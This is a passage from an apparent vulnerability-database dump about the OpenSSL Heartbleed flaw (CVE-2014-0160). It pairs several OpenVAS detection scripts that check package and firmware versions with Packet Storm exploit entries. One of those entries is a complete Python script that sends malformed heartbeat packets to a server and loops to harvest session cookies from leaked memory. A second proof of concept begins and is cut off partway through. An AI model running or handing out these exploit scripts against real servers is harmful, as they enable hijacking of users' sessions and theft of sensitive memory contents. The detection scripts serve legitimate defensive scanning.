"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2014:0376-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871154\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 12:13:57 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"RedHat Update for openssl RHSA-2014:0376-01\");\n\n\n script_tag(name:\"affected\", value:\"openssl on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0376-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-April/msg00017.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-06T16:43:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "A potential security vulnerability has been identified in HP Officejet\n Pro X printers and in certain Officejet Pro printers running OpenSSL. 
This is the OpenSSL\n vulnerability known as 'Heartbleed' (CVE-2014-0160) which could be exploited remotely\n resulting in disclosure of information.", "modified": "2019-12-05T00:00:00", "published": "2014-06-03T00:00:00", "id": "OPENVAS:1361412562310105040", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105040", "type": "openvas", "title": "HP Officejet Pro X Printers, Certain Officejet Pro Printers, Remote Disclosure of Information", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP Officejet Pro X Printers, Certain Officejet Pro Printers, Remote Disclosure of Information\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105040\");\n script_bugtraq_id(66690);\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2019-12-05T15:10:00+0000\");\n\n script_name(\"HP Officejet Pro X Printers, Certain Officejet Pro Printers, Remote Disclosure of Information\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/531993\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-06-03 16:01:41 +0200 (Tue, 03 Jun 2014)\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_hp_printer_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"hp_fw_ver\", \"hp_model\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit these issues to gain access to sensitive\n information that may aid in further attacks.\");\n\n script_tag(name:\"vuldetect\", value:\"Check the firmware version.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. 
Please see the references or vendor advisory\n for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"A potential security vulnerability has been identified in HP Officejet\n Pro X printers and in certain Officejet Pro printers running OpenSSL. This is the OpenSSL\n vulnerability known as 'Heartbleed' (CVE-2014-0160) which could be exploited remotely\n resulting in disclosure of information.\");\n\n script_tag(name:\"affected\", value:\"HP Officejet Pro X451dn < BNP1CN1409BR\n\nHP Officejet Pro X451dw < BWP1CN1409BR\n\nHP Officejet Pro X551dw < BZP1CN1409BR\n\nHP Officejet Pro X476dn < LNP1CN1409BR\n\nHP Officejet Pro X476dw < LWP1CN1409BR\n\nHP Officejet Pro X576dw < LZP1CN1409BR\n\nHP Officejet Pro 276dw < FRP1CN1416BR\n\nHP Officejet Pro 251dw < EVP1CN1416BR\n\nHP Officejet Pro 8610 < FDP1CN1416AR\n\nHP Officejet Pro 8615 < FDP1CN1416AR\n\nHP Officejet Pro 8620 < FDP1CN1416AR\n\nHP Officejet Pro 8625 < FDP1CN1416AR\n\nHP Officejet Pro 8630 < FDP1CN1416AR\n\nHP Officejet Pro 8640 < FDP1CN1416AR\n\nHP Officejet Pro 8660 < FDP1CN1416AR\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nport = get_kb_item( \"hp_printer/port\" );\nif( ! port ) port = 0;\n\nfw_ver = get_kb_item( \"hp_fw_ver\" );\nif( ! fw_ver ) exit( 0 );\n\nmodel = get_kb_item( \"hp_model\" );\nif( ! 
model ) exit( 0 );\n\nif(\"Officejet Pro X451dn\" >< model ) fixed_ver = 'BNP1CN1409BR';\nelse if( \"Officejet Pro X451dw\" >< model ) fixed_ver = 'BWP1CN1409BR';\nelse if( \"Officejet Pro X551dw\" >< model ) fixed_ver = 'BZP1CN1409BR';\nelse if( \"Officejet Pro X476dn\" >< model ) fixed_ver = 'LNP1CN1409BR';\nelse if( \"Officejet Pro X476dw\" >< model ) fixed_ver = 'LWP1CN1409BR';\nelse if( \"Officejet Pro X576dw\" >< model ) fixed_ver = 'LZP1CN1409BR';\nelse if( \"Officejet Pro 276dw\" >< model ) fixed_ver = 'FRP1CN1416BR';\nelse if( \"Officejet Pro 251dw\" >< model ) fixed_ver = 'EVP1CN1416BR';\nelse if( \"Officejet Pro 8610\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8615\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8620\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8625\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8630\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8640\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8660\" >< model ) fixed_ver = 'FDP1CN1416AR';\n\nif( ! 
fixed_ver ) exit( 0 );\n\nfw_build = int( substr( fw_ver, 6, 9 ) );\nfixed_build = int( substr( fixed_ver, 6, 9 ) );\n\nif( fw_build < fixed_build )\n{\n report = 'Detected Firmware: ' + fw_ver + '\\nFixed Firmware: ' + fixed_ver + '\\n';\n security_message(port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T18:39:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.", "modified": "2020-01-31T00:00:00", "published": "2014-04-10T00:00:00", "id": "OPENVAS:1361412562310850582", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850582", "type": "openvas", "title": "openSUSE: Security Advisory for update (openSUSE-SU-2014:0492-1)", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850582\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:36:01 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"openSUSE: Security Advisory for update (openSUSE-SU-2014:0492-1)\");\n\n script_tag(name:\"affected\", value:\"update on openSUSE 13.1, openSUSE 12.3\");\n\n script_tag(name:\"insight\", value:\"This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0492-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE12\\.3|openSUSE13\\.1)\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-03-20T16:44:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "A vulnerability has been discovered\nin OpenSSL", "modified": "2018-03-19T00:00:00", "published": "2014-04-07T00:00:00", "id": "OPENVAS:702896", "href": "http://plugins.openvas.org/nasl.php?oid=702896", "type": "openvas", "title": "Debian Security Advisory DSA 2896-1 (openssl - security update)", "sourceData": "# OpenVAS Vulnerability 
Test\n# $Id: deb_2896.nasl 9136 2018-03-19 13:08:02Z cfischer $\n# Auto-generated from advisory DSA 2896-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(702896);\n script_version(\"$Revision: 9136 $\");\n script_cve_id(\"CVE-2014-0160\");\n script_name(\"Debian Security Advisory DSA 2896-1 (openssl - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-03-19 14:08:02 +0100 (Mon, 19 Mar 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-04-07 00:00:00 +0200 (Mon, 07 Apr 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2896.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"openssl on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package contains the openssl binary and related tools.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthis problem has been fixed in version 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\");\n script_tag(name: \"summary\", value: \"A vulnerability has been discovered\nin OpenSSL's support for the TLS/DTLS Heartbeat extension. Up to 64KB of memory\nfrom either client or server can be recovered by an attacker. This vulnerability\nmight allow an attacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. 
More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:28", "description": "", "published": "2014-04-09T00:00:00", "type": "packetstorm", "title": "Heartbleed User Session Extraction", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "PACKETSTORM:126069", "href": "https://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html", "sourceData": "`#!/usr/bin/python \n \n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. 
\n# Michael Davis (mike.philip.davis@gmail.com) \n \n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n \n# The author disclaims copyright to this source code. \n \nimport select \nimport sys \nimport string \nimport struct \nimport socket \nimport time \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)') \n \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \n \nclass HeartBleeder(object): \n \nserver_response = None \nsocket = None \nhostname = '' \nport = 443 \nfound_sessions = set() \ncookie = 'session' \ncookie_length = 56 \n \ndef __init__(self, hostname='', cookie=''): \nself.hostname = hostname \nself.cookie = cookie \n \ndef connect(self): \n\"\"\" \nConnects to the remote server. 
\n\"\"\" \nself.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsys.stdout.flush() \nself.socket.connect((self.hostname, self.port)) \nsys.stdout.flush() \nself.socket.send(hello) \nsys.stdout.flush() \n \ndef rcv_response(self): \nwhile True: \n_type, version, payload = self.rcv_message() \nif _type is None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif _type == 22 and ord(payload[0]) == 0x0E: \nbreak \n \ndef rcv_message(self): \n \nrecord_header = self.rcv_all(5) \nif record_header is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \n_type, version, line = struct.unpack('>BHH', record_header) \npayload = self.rcv_all(line, 10) \nif payload is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \n# print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn _type, version, payload \n \ndef rcv_all(self, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([self.socket], [], [], 5) \nif self.socket in r: \ndata = self.socket.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \ndef try_heartbeat(self): \nself.socket.send(hb) \nwhile True: \n_type, version, self.payload = self.rcv_message() \nif _type is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif _type == 24: \n# print 'Received heartbeat response:' \nself.parse_response() \nif len(self.payload) > 3: \npass \n# print 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' 
\nreturn True \n \nif _type == 21: \nprint 'Received alert:' \nself.hexdump(self.payload) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef parse_response(self): \n\"\"\" \nParses the response from the server for a session id. \n\"\"\" \nascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload) \nindex = string.find(ascii, self.cookie) \nif index >= 0: \ninfo = ascii[index:index + self.cookie_length] \nsession = info.split(' ')[0] \nsession = string.replace(session, ';', '') \nif session not in self.found_sessions: \nself.found_sessions.add(session) \nprint session \n \ndef hexdump(self, payload): \n\"\"\" \nPrints out a hexdump in the event that server returns an error. \n\"\"\" \nfor b in xrange(0, len(payload), 16): \nline = [c for c in payload[b:b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in line) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef scan(self): \nself.connect() \nself.rcv_response() \nself.try_heartbeat() \n \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ncookies_str = 'session' \nif len(args) > 1: \ncookies_str = args[1] \n \nprint cookies_str \n \nwhile True: \nheartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str) \nheartbeat.scan() \n \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126069/heartbleed-altered.py.txt"}, {"lastseen": "2016-12-05T22:25:07", "description": "", "published": "2014-04-08T00:00:00", "type": "packetstorm", "title": "OpenSSL TLS Heartbeat Extension Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "PACKETSTORM:126065", "href": 
"https://packetstormsecurity.com/files/126065/OpenSSL-TLS-Heartbeat-Extension-Memory-Disclosure.html", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 